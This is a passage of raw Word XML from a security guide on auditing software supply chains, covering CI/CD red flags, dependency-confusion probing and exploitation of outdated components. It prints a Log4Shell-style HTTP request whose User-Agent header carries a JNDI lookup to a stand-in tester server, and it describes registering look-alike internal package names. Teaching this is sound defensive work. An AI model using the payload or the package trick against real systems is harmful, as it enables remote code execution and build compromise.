    <w:p w14:paraId="37990929" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What they look for:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> They scan CI/CD pipeline definition files (like GitHub Actions YAMLs or GitLab CI files) looking for anomalies like unpinned actions (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>uses: actions/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>checkout@latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of a specific SHA hash) or build scripts executing unverified </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">curl | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands directly from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501386C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Manual Code Review (Reading the Manifests and Pipelines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE4880"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When auditing source repositories and deployment configurations, security reviewers must look for red flags tied to how external dependencies are imported and how the build architecture is configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9011FE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Red Flags in Manifest Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F1FA8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unpinned Versions:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for flexible version definitions, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>^1.2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in package configuration files. This tells the build server to pull whatever the registry provides at build time, opening the door for unexpected code injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E3677" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Obsolete or Orphaned Packages (CWE-1104):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify dependencies that have not seen an upstream commit or security patch in years. If an application relies heavily on abandoned code bases, it represents a ticking clock for an unpatched zero-day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC432D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Red Flags in Build and Pipeline Configuration Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A0E49" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lack of Integrity Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for download commands that fetch binaries or libraries via </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or custom setup scripts without verifying the target file's SHA-256 cryptographic hash immediately afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2C096" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Over-Permissive Pipeline Secrets:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Review CI/CD pipeline configurations to ensure that powerful environment secrets (like production cloud deployment keys or registry publishing tokens) are exposed globally to every build script or untrusted pull-request branch, rather than being scoped strictly to protected production deployment environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169331EE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. Penetration Testing (Pipeline &amp; Behavioral Verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF3F78"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Penetration testers and red teams evaluate supply chain vulnerabilities by looking at the application as an ecosystem rather than a single target endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062A76D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dependency Confusion Probing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDC95B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> reviews an organization's public client-side JavaScript bundle files or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> repositories to locate internal, proprietary package names (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>@corp-internal/payment-gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E269D9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The tester attempts to register that exact identical package name on a public registry (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">) with a highly inflated version number (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>v99.9.9</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). If the target organization’s internal build pipeline is misconfigured to prioritize public registries over private ones, the build server will automatically pull down the tester’s dummy public package during the next automated deployment cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63036FBD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Exploiting Vulnerable Sub-Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2918F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an SCA or manual review identifies an unpatched, high-severity vulnerability within a known dependency running in production (such as an outdated Log4j or Apache Struts framework), the tester crafts target-specific payloads aimed directly at the component's unique inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6E401" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload Example (Log4Shell Style):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95D806" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D39F7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/v1/login HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5A621" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   Host: target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2FAF5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   User-Agent: ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>://tester-controlled-server.com/a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729260F8"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 xml:space="preserve">If the underlying application passes the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>User-Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> header directly into an unpatched, vulnerable logging library, the library processes the string natively, attempts to connect back to the tester's server, and triggers a full Remote Code Execution (RCE) breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749EED5F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pipeline Poisoning Simulation:</w:t>
      </w:r>
    </w:p>
